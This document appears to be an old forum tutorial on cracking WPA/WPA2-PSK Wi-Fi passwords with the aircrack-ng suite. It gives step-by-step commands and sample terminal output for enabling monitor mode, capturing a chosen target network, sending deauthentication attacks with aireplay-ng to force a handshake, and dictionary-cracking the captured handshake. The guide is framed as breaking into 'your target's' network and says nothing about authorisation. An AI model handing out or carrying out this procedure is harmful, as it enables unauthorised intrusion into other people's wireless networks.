How to hack Wifi Password? [WPA Cracking]

How To Crack Wireless Networks WPA psk/psk2

Requirements

1. Linux OS ( almost any will work )
2. Aircrack-Ng Suite
3. Madwifi Driver ** search on google **
4. A Good Dictionary file

** If using backtrack or another live cd these things are probably already built in.

STARTING:

Alright before doing any of this make sure your network card is compatible with aircrack & madwifi! Some cards dont wake up after you put them in monitor mode.

Ok login as root and goto a terminal.

[root@localhost ~]# airmon-ngInterface   Chipset      Driver

wifi0      Atheros      madwifi-ng

ath0      Atheros      madwifi-ng VAP (parent: wifi0)

Now just put your card in monitor mode

[root@localhost ~]# airmon-ng stop ath0Interface   Chipset      Driver

wifi0      Atheros      madwifi-ng

ath0      Atheros      madwifi-ng VAP (parent: wifi0)

[root@localhost ~]# airmon-ng start wifi0

Interface   Chipset      Driver

wifi0      Atheros      madwifi-ng

ath0      Atheros      madwifi-ng VAP (monitor mode enabled)

now just

type: ifconfig ath0 up

type: iwconfig

[root@localhost ~]# iwconfig

lo        no wireless extensions.eth0      no wireless extensions.

wifi0     no wireless extensions.

pan0      no wireless extensions.

: **:**:**:**:**:**

Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=1/1

Retry:off   RTS thr:off   Fragment thr:off

Encryption key:off

Power Management:off

Link Quality=0/70  Signal level=-93 dBm  Noise level=-93 dBm

Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0

Tx excessive retries:0  Invalid misc:0   Missed beacon:0

ath0      IEEE 802.11g  ESSID:”"  Nickname:”"

Mode:Monitor  Frequency:2.437 GHz Access Point

CAPTURING:

ok now you have to start capturing your targets network so first open a new terminal window.

airodump-ng ath0

This shows all the networks you can capture in your area. Find the network you want to crack that is wpa protected, and copy the bssid ( mac address )

**DIRECTIONS**

airodump-ng:

-c channel that your target is on

example: airodump-ng -c 6

-w The name you want to save the capture as

example: airodump-ng -c 6 -w wpapsk

example2: /root/wpapsk-01.cap

–bssid The bssid that you want to capture ( the one you copied )

example: airodump-ng -c 6 -w wpapsk –bssid **:**:**:**:**:**

ath0 the interface you are using

example: airodump-ng -c 6 -w wpapsk –bssid **:**:**:**:**:** ath0

**END OF DIRECTIONS**

Alright now type: airodump-ng -c XX -w whateveruwant –bssid **:**:**:**:**:** ath0

CH  6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

**:**:**:**:**:**   12 100     2495        7    0   6  54  WPA  TKIP   PSK   BOBNET

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

NOW WAIT untill a client connects to the network.

AIREPLAY:

Next your going to use aireplay to send attacks.

**DIRECTIONS**

aireplay-ng

xx= mine

**=targets

-0 5 This sends 5 attacks to the target

example: aireplay-ng -0 5

-a the target wireless networks bssid

example: aireplay-ng -0 5 -a **:**:**:**:**:**

-c your access point bssid ( remember iwconfig that i told you to leave open )

example: aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx

ath0 The interface and your ready to go!

example:

aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx ath0

** END OF DIRECTIONS **

CRACKING:

when your airodump finally shows this:

CH 6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51 [WPA HANDSHAKE FOUND]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

**:**:**:**:**:** 12 100 2495 7 0 6 54 WPA TKIP PSK ************

BSSID STATION PWR Rate Lost Packets Probes

Then you can now crack there network!

FIRST YOU NEED A DICTIONARY FILE

make sure you know the directory its in.

**DIRECTIONS**

aircrack-ng

[the directory not a command]

example: aircrack-ng /root/w.ethenamewas-01.cap

-w The dictionary file ( the whole directory ) and then run the command!!

[root@localhost ~]#aircrack-ng /root/w.ethenamewas-01.cap -w /usr/share/dict/linux.words

**END OF DIRECTIONS**

Once you run the command It should start cracking...

Aircrack-ng 1.0 rc1[00:00:02] 622 keys tested (303.68 k/s)

Current passphrase: abscision

Master Key     : 38 1A FF 6F C1 D1 B5 EE D5 73 FC A7 48 54 4E 1E

2E A8 A1 55 BD E2 2E 36 63 49 C0 96 DF CA 7E 5A

Transcient Key : 6F A6 0D 93 46 F9 A2 6B AB 31 96 31 F9 C6 5F 51

83 91 86 59 30 A0 DB 95 43 5F D4 72 BA 5D BD B1

51 98 06 9B 7D E8 DD 4D AA 37 B3 E6 1F DF 1F 50

71 35 B9 2F 33 6F 89 1B E2 13 89 74 E5 E6 16 17

EAPOL HMAC     : 68 B3 E9 AB 56 01 6C D8 A6 BE 4D B6 C2 0C 9D D0

THIS WILL ONLY WORK IF THE PASSWORD IS SOMEWHERE IN YOUR DICTIONARY!!

**This concludes my guide to crack wireless networks!!

Any problems just PM or comment.